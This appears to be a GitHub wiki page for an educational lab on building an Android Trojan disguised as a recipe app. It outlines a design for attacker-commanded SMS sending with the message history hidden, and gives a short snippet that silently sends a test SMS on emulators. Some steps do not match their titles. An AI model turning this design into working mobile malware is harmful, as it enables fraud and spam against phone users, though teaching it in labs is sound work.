Skip to content
Shiven Chawla edited this page Jun 27, 2017 · 3 revisions

Welcome to the Trojan_Recipe Wiki: Development of Trojan on Android

Special Notice

These labs are for educational purposes. Readers should perform gracefully based on hacking ethics and should not spread or utilize the code in these labs to harm other Android phone users to gain their own benefits. A more thorough specification of hacking ethics can be found here and here. Please read them carefully.

Objective

In this lab, we will develop an Android Trojan from scratch to demonstrate the concept of Mobile Malware on Android platform. The main functionality of this Android Trojan is sending text messages to others according to a hacker's commands. In order to make the user unconscious of the malicious activities, this Trojan will delete all the messaging history. The diagram below illustrates the work flow of this Android Trojan.

Objective

The Development of the Android Trojan

The appearance of this Trojan is an introduction to an Asian dish, Hong Shao Shi Zi Tou. We assume that the victim is interested in Asian food and she has downloaded this app carelessly.

When the victim activates the application, the Trojan will send a notification to the hacker, which encodes the information of the user's IP address and a port number for malicious communication. Then, the Trojan and the hacker are able to set up a TCP/IP communication channel, via which the hacker can send commands to the Trojan on victim's device. When receive a command from the hacker, the Trojan will analyze the data packet, abstract the target user's phone numbers and the content of the malicious message, and finally send the malicious messages to the target phone users. After sending text messages, the Trojan will delete the messaging history. If the target phone users send complaint messages back to user, the Trojan will stop the arriving of those complaint messages to the user's phone.

Tutorial

Step 1: Installation

a) Download the Benign Recipe Application.
b) Start Android Studio and import the MalRecipe.

Step 2: MainActivity

a) In “Project” view, navigate to MalRecipe → app → src → main → java → com.example.malrecipe → MainActivity.
TutorialStep2a
b) Open the class MainActivity.java.
c) Go to the method called startServer().
d) Paste the content of the following code into the “MainActivity” class replacing the original content:

    PendingIntent pi; 
    SmsManager sms; 
 
    @Override 
    protected void onCreate(Bundle savedInstanceState) {         super.onCreate(savedInstanceState);         setContentView(R.layout.activity_main); 
 
        String msg = "android.telephony.SmsManager.STATUS_ON_ICC_SENT"; 
        PendingIntent piSent = PendingIntent.getBroadcast(MainActivity.this, 0,new Intent(msg), 0); 
 
        sms = SmsManager.getDefault(); 
        sms.sendTextMessage("5556", null, "This is sample test message", piSent, null); 
    } 
 
    @Override 
    public boolean onCreateOptionsMenu(Menu menu) { 
        // Inflate the menu; this adds items to the action bar if it is present.         getMenuInflater().inflate(R.menu.main, menu);         return true; 
    } 
 
    @Override 
    public boolean onOptionsItemSelected(MenuItem item) { 
        // Handle action bar item clicks here. The action bar will         // automatically handle clicks on the Home/Up button, so long         // as you specify a parent activity in AndroidManifest.xml. 
        int id = item.getItemId();         if (id == R.id.action_settings) { 
            return true; 
        } 
        return super.onOptionsItemSelected(item); 
    } 

After step 2, your code should look like this:
TutorialStep2d

Step3: SMSReceiver

a) In “Android” view, navigate to app → res
TutorialStep3a
b) Right click res, select New → Android resource directory

  • In the Directory name, type “menu” and press “Ok”:
    TutorialStep3b
    c) Right click and create a new “Menu resource file”:
  • Name is main and press “Ok”: TutorialStep3c1
    TutorialStep3c2
  • Leave the file blank and close it.

Step 4: AndroidManifest

a) In the same view, go to app → manifests → AndroidManifest.xml
b) Open the AndroidManifest.xml file
c) Paste the following code, Code 4.3, into the second last line.

<uses-permission android:name="android.permission.SEND_SMS"/> 

Your code should look like this after step 4:
TutorialStep4c

Demonstration

Step 1: Create Jelly Bean emulator

a) Open the AVD Manager.
DemonstrationStep1a
b) Click on ‘Create Virtual Device’
DemonstrationStep1b
c) As you create a new emulator, make sure that you select Jelly Bean as the System Image (shown below). If you do not have it, you can click ‘Download’ to install it.
DemonstrationStep1c
d) Give a suitable name for the emulator so that you know it is your Jelly Bean emulator.
DemonstrationStep1d
e) Click Finish.

Step 2: Start two emulators

a) Open the “Android Virtual Device (AVD) Manager.”
DemonstrationStep2a
b) Start your Jelly Bean emulator first and then the default emulator provided by Android Studio (Nexus 5 API 21 x86).
DemonstrationStep2b
c) When you start the emulators, take note of the port numbers at the top of the windows.
DemonstrationStep2c
These numbers will be important in the rest of the lab.

Step 3: Install the Malrecipe app in Jelly Bean emulator

a) Click the run button in the toolbar.
DemonstrationStep3a
b) Choose to install and execute the app in the Jelly Bean emulator.
DemonstrationStep3b
c) After the installation, we will see the Malrecipe app installed with the app name “Trojan”.
DemonstrationStep3c
d) After starting the app, MalRecipe starts to listen to the port “7777”.
e) Checking the SMS in two emulators. We can see that the Nexus 5 emulator received a message from the Jelly Bean emulator, however, the Jelly Bean emulator has no record of sending the message.
DemonstrationStep3e

Try closing the app in one emulator and opening it again. What do you observe?